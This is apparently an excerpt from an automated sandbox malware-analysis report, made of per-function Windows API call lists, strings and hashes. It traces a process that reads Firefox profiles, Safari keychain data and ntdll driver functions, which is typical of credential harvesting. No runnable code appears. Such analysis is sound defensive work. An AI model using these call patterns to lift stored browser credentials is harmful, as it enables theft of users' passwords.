                                                            • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • EmptyClipboard.USER32 ref: 004098EC
                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                            • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                            • GlobalFix.KERNEL32(00000000), ref: 00409927
                                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                            • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                            • GetLastError.KERNEL32 ref: 0040995D
                                                            • CloseHandle.KERNEL32(?), ref: 00409969
                                                            • GetLastError.KERNEL32 ref: 00409974
                                                            • CloseClipboard.USER32 ref: 0040997D
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                            • String ID:
                                                            • API String ID: 2565263379-0
                                                            • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                            • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                            • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                            • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                            • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                            • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                            • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Library$AddressFreeLoadMessageProc
                                                            • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                            • API String ID: 2780580303-317687271
                                                            • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                            • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                            • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                            • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • EmptyClipboard.USER32 ref: 00409882
                                                            • wcslen.MSVCRT ref: 0040988F
                                                            • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                            • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                                            • memcpy.MSVCRT ref: 004098B5
                                                            • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                            • CloseClipboard.USER32 ref: 004098D7
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                                            • String ID:
                                                            • API String ID: 2014503067-0
                                                            • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                            • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                            • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                            • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetLastError.KERNEL32 ref: 004182D7
                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                            • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                            • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                            • LocalFree.KERNEL32(?), ref: 00418342
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                              • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,76F8DF80,?,0041755F,?), ref: 00417452
                                                              • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                            • String ID: OsError 0x%x (%u)
                                                            • API String ID: 403622227-2664311388
                                                            • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                            • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                            • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                            • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • _wcsicmp.MSVCRT ref: 004022A6
                                                            • _wcsicmp.MSVCRT ref: 004022D7
                                                            • _wcsicmp.MSVCRT ref: 00402305
                                                            • _wcsicmp.MSVCRT ref: 00402333
                                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                              • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                            • memset.MSVCRT ref: 0040265F
                                                            • memcpy.MSVCRT ref: 0040269B
                                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                            • memcpy.MSVCRT ref: 004026FF
                                                            • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                            • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                            • API String ID: 577499730-1134094380
                                                            • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                            • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                            • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                            • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                            • String ID: :stringdata$ftp://$http://$https://
                                                            • API String ID: 2787044678-1921111777
                                                            • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                            • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                            • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                            • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                            • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                            • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                            • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                            • GetWindowRect.USER32(?,?), ref: 00414088
                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                            • GetDC.USER32 ref: 004140E3
                                                            • wcslen.MSVCRT ref: 00414123
                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                            • ReleaseDC.USER32(?,?), ref: 00414181
                                                            • _snwprintf.MSVCRT ref: 00414244
                                                            • SetWindowTextW.USER32(?,?), ref: 00414258
                                                            • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                            • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                            • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                            • GetClientRect.USER32(?,?), ref: 004142E1
                                                            • GetWindowRect.USER32(?,?), ref: 004142EB
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                            • GetClientRect.USER32(?,?), ref: 0041433B
                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                            • String ID: %s:$EDIT$STATIC
                                                            • API String ID: 2080319088-3046471546
                                                            • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                            • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                            • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                            • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • EndDialog.USER32(?,?), ref: 00413221
                                                            • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                            • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                            • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                            • memset.MSVCRT ref: 00413292
                                                            • memset.MSVCRT ref: 004132B4
                                                            • memset.MSVCRT ref: 004132CD
                                                            • memset.MSVCRT ref: 004132E1
                                                            • memset.MSVCRT ref: 004132FB
                                                            • memset.MSVCRT ref: 00413310
                                                            • GetCurrentProcess.KERNEL32 ref: 00413318
                                                            • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                            • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                            • memset.MSVCRT ref: 004133C0
                                                            • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                            • memcpy.MSVCRT ref: 004133FC
                                                            • wcscpy.MSVCRT ref: 0041341F
                                                            • _snwprintf.MSVCRT ref: 0041348E
                                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                            • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                            • SetFocus.USER32(00000000), ref: 004134B7
                                                            Strings
                                                            • {Unknown}, xrefs: 004132A6
                                                            • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                            • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                            • API String ID: 4111938811-1819279800
                                                            • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                            • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                            • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                            • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                            • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                            • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                            • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                            • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                            • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                            • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                            • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                            • EndDialog.USER32(?,?), ref: 0040135E
                                                            • DeleteObject.GDI32(?), ref: 0040136A
                                                            • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                            • ShowWindow.USER32(00000000), ref: 00401398
                                                            • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                            • ShowWindow.USER32(00000000), ref: 004013A7
                                                            • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                            • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                            • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                            • String ID:
                                                            • API String ID: 829165378-0
                                                            • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                            • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                            • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                            • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 00404172
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                            • wcscpy.MSVCRT ref: 004041D6
                                                            • wcscpy.MSVCRT ref: 004041E7
                                                            • memset.MSVCRT ref: 00404200
                                                            • memset.MSVCRT ref: 00404215
                                                            • _snwprintf.MSVCRT ref: 0040422F
                                                            • wcscpy.MSVCRT ref: 00404242
                                                            • memset.MSVCRT ref: 0040426E
                                                            • memset.MSVCRT ref: 004042CD
                                                            • memset.MSVCRT ref: 004042E2
                                                            • _snwprintf.MSVCRT ref: 004042FE
                                                            • wcscpy.MSVCRT ref: 00404311
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                            • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                            • API String ID: 2454223109-1580313836
                                                            • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                            • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                            • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                            • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                            • SetMenu.USER32(?,00000000), ref: 00411453
                                                            • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                            • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                            • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                            • memcpy.MSVCRT ref: 004115C8
                                                            • ShowWindow.USER32(?,?), ref: 004115FE
                                                            • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                            • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                            • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                            • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                            • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                              • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                              • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                            • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                            • API String ID: 4054529287-3175352466
                                                            • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                            • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                            • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                            • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: wcscat$_snwprintfmemset$wcscpy
                                                            • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                            • API String ID: 3143752011-1996832678
                                                            • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                            • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                            • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                            • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                            • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                            • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                            • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                            • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                            • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                            • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                            • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                            • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule
                                                            • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                            • API String ID: 667068680-2887671607
                                                            • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                            • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                            • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                            • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: _snwprintfmemset$wcscpy$wcscat
                                                            • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                            • API String ID: 1607361635-601624466
                                                            • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                            • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                            • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                            • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: _snwprintf$memset$wcscpy
                                                            • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                            • API String ID: 2000436516-3842416460
                                                            • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                            • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                            • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                            • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                              • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                              • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                              • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                            • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                            • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                            • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                            • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                            • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                            • LoadIconW.USER32(00000000,00000076), ref: 00403634
